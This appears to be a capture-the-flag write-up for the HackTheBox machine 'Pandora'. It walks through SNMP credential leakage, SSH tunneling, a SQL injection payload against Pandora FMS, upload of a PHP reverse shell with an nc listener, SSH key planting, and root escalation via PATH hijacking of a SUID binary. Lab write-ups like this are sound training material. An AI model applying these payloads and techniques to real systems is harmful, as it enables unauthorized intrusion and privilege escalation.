10 minute read

Machine Information


Pandora is an easy machine on HackTheBox. An initial website on port 80 reveals nothing, but enumeration of UDP ports exposes credentials for SSH. We find a binary that points us to a website running locally on the box, which we access via port tunneling. We gain admin access to Pandora FMS on the box via an exploit. From there we upload a reverse shell to gain access as a low level user. Enumeration finds another binary, this one uses an unquoted path to tar which it uses to back up the pandora site. We use this to get a root shell to complete the box.

Skills required are basic web and OS enumeration. Skills learned are using public exploits, and tunneling traffic to access remote sites.

Hosting Site HackTheBox
Link To Machine HTB - Easy - Pandora
Machine Release Date 8th January 2022
Date I Completed It 20th January 2022
Distribution Used Kali 2021.3 – Release Info

Initial Recon

As always let’s start with Nmap:

└─# ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─# nmap -p$ports -sC -sV -oA pandora
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 20:54 GMT
Nmap scan report for
Host is up (0.030s latency).

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.81 seconds

Just a website on port 80 to look at to start with:


Looking around we find it’s a simple html site with nothing of interest. Next I did a quick scan of UDP ports:

└─# nmap -sU --top-ports=20
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:32 GMT
Nmap scan report for
Host is up (0.025s latency).

53/udp    closed        domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open          snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   closed        isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 8.40 seconds


Port 161 which is SNMP is open, let’s have a closer look at that:

└─# nmap -sC -sV -sU -p161 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 21:26 GMT
Nmap scan report for
Host is up (0.021s latency).

161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-win32-software: 
|   accountsservice_0.6.55-0ubuntu12~20.04.5_amd64; 2021-12-07T12:57:21
|   adduser_3.118ubuntu2_all; 2021-02-01T17:21:32
|   alsa-topology-conf_1.2.2-1_all; 2021-02-01T17:25:18
|   alsa-ucm-conf_1.2.2-1ubuntu0.11_all; 2021-12-07T12:57:25
|   amd64-microcode_3.20191218.1ubuntu1_amd64; 2021-06-11T12:44:07
|   apache2-bin_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
|   apache2-data_2.4.41-4ubuntu3.8_all; 2021-12-07T12:57:07
|   apache2-utils_2.4.41-4ubuntu3.8_amd64; 2021-12-07T12:57:07
|   837: 
|     Name: cron
|     Path: /usr/sbin/CRON
|     Params: -f
|   838: 
|     Name: sh
|     Path: /bin/sh
|     Params: -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p <HIDDEN>'

There was a long list returned but we see something interesting, a username and password have been leaked.

SSH Access As Daniel

Trying these credentials on the SSH port we saw open works:

└─# ssh daniel@                                          
daniel@'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
  System information as of Wed 19 Jan 21:34:26 UTC 2022

We’re in and a quick look at the passwd file shows there’s another user called matt:

daniel@pandora:~$ cat /etc/passwd | grep /bin/bash

The user flag is owned by Matt so we can’t get that yet:

daniel@pandora:~$ ls -ls /home/matt/
4 -rw-r----- 1 root matt 33 Jan 19 17:08 user.txt

Looking at running processes shows the same long list we saw before:

daniel@pandora:~$ ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 17:07 ?        00:00:03 /sbin/init maybe-ubiquity
root           2       0  0 17:07 ?        00:00:00 [kthreadd]
root           3       2  0 17:07 ?        00:00:00 [rcu_gp]
root         835       1  0 17:07 ?        00:00:00 /usr/sbin/cron -f
root         837     835  0 17:07 ?        00:00:00 /usr/sbin/CRON -f
root         838     837  0 17:07 ?        00:00:00 /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p <HIDDEN>'
daemon       860       1  0 17:07 ?        00:00:00 /usr/sbin/atd -f
Debian-+     863       1  0 17:07 ?        00:00:07 /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
root         864       1  0 17:07 ?        00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         874       1  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
root         941       1  0 17:07 tty1     00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root         949       1  0 17:07 ?        00:00:00 /usr/lib/policykit-1/polkitd --no-debug
mysql        967       1  0 17:07 ?        00:00:12 /usr/sbin/mysqld
www-data    1048     874  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1049     874  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1050     874  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1051     874  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1052     874  0 17:07 ?        00:00:00 /usr/sbin/apache2 -k start
root        1119     838  0 17:08 ?        00:00:00 /usr/bin/host_check -u daniel -p <HIDDEN>

Suspicious Binary

The file host_check is being run with those credentials we used to get in, let’s have a look at that:

daniel@pandora:~$ cat /usr/bin/host_check
PandoraFMS host check utilityNow attempting to check PandoraFMS registered hosts.Files will be saved to ~/.host_check/usr/bin/curl 
> ~/.host_check 2>/dev/nullHost check unsuccessful!
Please check your credentials.
Terminating program!Host check successful!
Terminating program!Ussage: ./host_check -u username -p password.Two arguments expected.����X����h���XM���������X���0zRx

It’s a binary file so the output from cat is messed up but we can see curl in there with a URL. We can try that on the box:

daniel@pandora:~$ curl
[1] 2406
[2] 2407
[3] 2408
[4] 2409
[5] 2410
daniel@pandora:~$ auth error
[1]   Done                    curl
[2]   Done                    op2=all_agents
[3]   Done                    return_type=csv
[4]-  Done                    other_mode=url_encode_separator_%7C
[5]+  Done                    user=daniel

Port Forwarding

Ok, I have no idea what it’s doing! However there is something running on the loopback IP with what looks like a subfolder called pandora_console. We can use port forwarding like we have many times in the past, most recently on Static:

└─# ssh -L 8000: daniel@
daniel@'s password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
  System information as of Wed 19 Jan 21:52:09 UTC 2022
Last login: Wed Jan 19 21:34:27 2022 from

Above is logging in to an SSH session on the box using the credentials for Daniel, but this time we’re forwarding any traffic to our Kali port 8000 through the SSH tunnel to the box on port 80. Doing this we can use a web browser on Kali to access that website we’ve found on the box via SSH:


Pandora Console

Now we can access that console and we see something called Pandorea FMS. Clicking on the docs link top left takes us here. Also at the bottom of this landing page we see the version on the box is revealed as v7.0NG.742_FIX_PERL2020.

After a quick search I found this blog that shows a vulnerability in that version on Pandora. Looking up the CVE in there we find this Github repo with a proof of concept to try.

It’s simple enough, we just paste this in to our browser on Kali whilst we have our tunnel forwarding to the box:,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271


In a new tab open the pandora_console again and now we have access as admin:


There’s a lot to look around but eventually I found this File Manager section:


Which takes me to a list of files. Clicking the top right icon brings up this Upload Files box:


Reverse Shell

Time for a reverse shell. Let’s use one of the PHP shells already included on Kali:

└─# cp /usr/share/laudanum/php/php-reverse-shell.php .

└─# cat php-reverse-shell.php | grep '$ip'
$ip = '';  // CHANGE THIS

All I’ve done is changed the IP to my current tun0. Switch back to the webpage and upload the file:


That works and scrolling down the long list of files we can find ours:


Hovering over the files we can see a path in the URLs:

In there you can see it says directory=images. This is the path to the file we’ve uploaded, start a nc listening in another terminal then browse to the shell we uploaded:


Back to the terminal to see we’re connected:

└─# nc -nlvp 8888             
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 55864
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

First thing lets upgrade our shell:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/$ ^Z
zsh: suspended  nc -nlvp 8888
└─# stty raw -echo; fg
[1]  + continued  nc -nlvp 8888
matt@pandora:/$ export TERM=xterm
matt@pandora:/$ stty rows 51 cols 236

User Flag

That’s better. Now we can see we’re in as Matt, let’s grab the user flag:

matt@pandora:/$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)

matt@pandora:/$ cat /home/matt/user.txt 

Pandora Backup

A look around found an interesting file:

matt@pandora:/$ find / -perm -4000 2>/dev/null

What is pandora_backup?

matt@pandora:/$ ls -lsa /usr/bin/pandora_backup 
20 -rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup

Not sure, let’s see what it does:

matt@pandora:/$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!

It doesn’t seem to work. Looking inside it with cat reveals it’s another binary, and we can see it’s using tar to backup the pandora installation to a folder in root:

matt@pandora:/$ cat /usr/bin/pandora_backup
          @@@@h���HHmm   HH�-�=�=hp�-�=�=����DDP�td� � � <<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNUqtðG7�%H9�
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*Backup failed!
Check your permissions!Backup successful!Terminating program!<(�������������X}�������h���8zRx

SSH Access As Matt

After a fruitless play around I eventually decided to drop out of this reverse shell and use a proper SSH session. First create a new key pair on Kali:

└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/htb/pandora/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/htb/pandora/id_rsa
Your public key has been saved in /root/htb/pandora/id_rsa.pub
The key fingerprint is:
SHA256:sJrMlhq6+lBuOaxgeVcKujv75rGInYGSf1A2GHa2fXY root@kali
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|  o o            |
| . = o.          |
|  . = .oo E      |
|  .+ ..+S.       |
| *++.+o          |
|*+O+Bo           |
|=O+O=            |
|BB&=             |

Don’t forget to change permissions:

└─# chmod 600 id_rsa

Copy the public key to the clipboard:

└─# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoUK0S9FLwAzcvY5zWa70acZ/CWevVuxj3zIfjhFjZnklGvsCpFxTK124kVy8htLciaaP25f+14g2cD65Ao5DOJQclwI7h8oEXk879NvwDhBnqTt6S+OXn44XPIFvt9cdpaaxDDMZkRrh0mHtC9XVnTk0d/Sq61afh5/k9MozSJpvX55et2p/+Hj7Mk77q/zK2/Nt4MFtNogwlVd9ArQgOiyljKpG1Byjb/IYOssbdhgV1rgqoSVInXgWUeoXZmSpkmzK/W5wQ6sCkRBBmnHe8aLsZr++5YDZM9M8yuO1HxMK0KhSl5xrjvwBp7f8+PLt9DR+vmgiHxz5JUIPu1lOFrBxjozM5oXA4WBvmDFzJH+B4Ti0PJNA2qMCXO8SNFk06+tkkxHZ4tBRhpTpaESKafeFzlIamGIA9xKlL9bxfPhHKwAHVEo8Emopj4foaf8ho3Cy7u5/69s0p1DWZ1bAED367C0QbF5GmvsI/9Zny03badPLt17O558foH9+RfOE= root@kali

Back on the box make the .ssh folder in Matts home directory:

matt@pandora:/home/matt$ mkdir .ssh

Now paste that public key from Kali on to the box and save to authorized_keys:

matt@pandora:/home/matt$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDoUK0S9FLwAzcvY5zWa70acZ/CWevVuxj3zIfjhFjZnklGvsCpFxTK124kVy8htLciaaP25f+14g2cD65Ao5DOJQclwI7h8oEXk879NvwDhBnqTt6S+OXn44XPIFvt9cdpaaxDDMZkRrh0mHtC9XVnTk0d/Sq61afh5/k9MozSJpvX55et2p/+Hj7Mk77q/zK2/Nt4MFtNogwlVd9ArQgOiyljKpG1Byjb/IYOssbdhgV1rgqoSVInXgWUeoXZmSpkmzK/W5wQ6sCkRBBmnHe8aLsZr++5YDZM9M8yuO1HxMK0KhSl5xrjvwBp7f8+PLt9DR+vmgiHxz5JUIPu1lOFrBxjozM5oXA4WBvmDFzJH+B4Ti0PJNA2qMCXO8SNFk06+tkkxHZ4tBRhpTpaESKafeFzlIamGIA9xKlL9bxfPhHKwAHVEo8Emopj4foaf8ho3Cy7u5/69s0p1DWZ1bAED367C0QbF5GmvsI/9Zny03badPLt17O558foH9+RfOE= root@kali" > .ssh/authorized_keys

Don’t forget to change permissions:

matt@pandora:/home/matt$ chmod -R 600 .ssh/

Now we can log in via SSH as Matt using our keys:

└─# ssh -i id_rsa matt@
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
ystem information as of Wed 19 Jan 22:51:24 UTC 2022

This time when we run the backup it works:

matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: Removing leading `/' from member names
tar: Removing leading `/' from hard link targets
Backup successful!
Terminating program!

Privilege Escalation

Now we can take advantage of that unquoted path to tar that we saw when looking in the backup program.

Just create our own file called tar which calls bash and make it executable:

matt@pandora:~$ echo '/bin/bash;' > tar
matt@pandora:~$ chmod +x tar

Add this folder to $PATH at the start so our version of tar is used instead of the correct one:

matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ $PATH
-bash: /home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin: No such file or directory

With /home/matt at the start of the path the backup program will use tar in there instead. Run the backup again:

matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client

Root Flag

It stops before doing anything and we are at a root prompt. Let’s grab the flag:

root@pandora:~# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:~# cat /root/root.txt

All done. Hope you enjoyed this box, see you next time.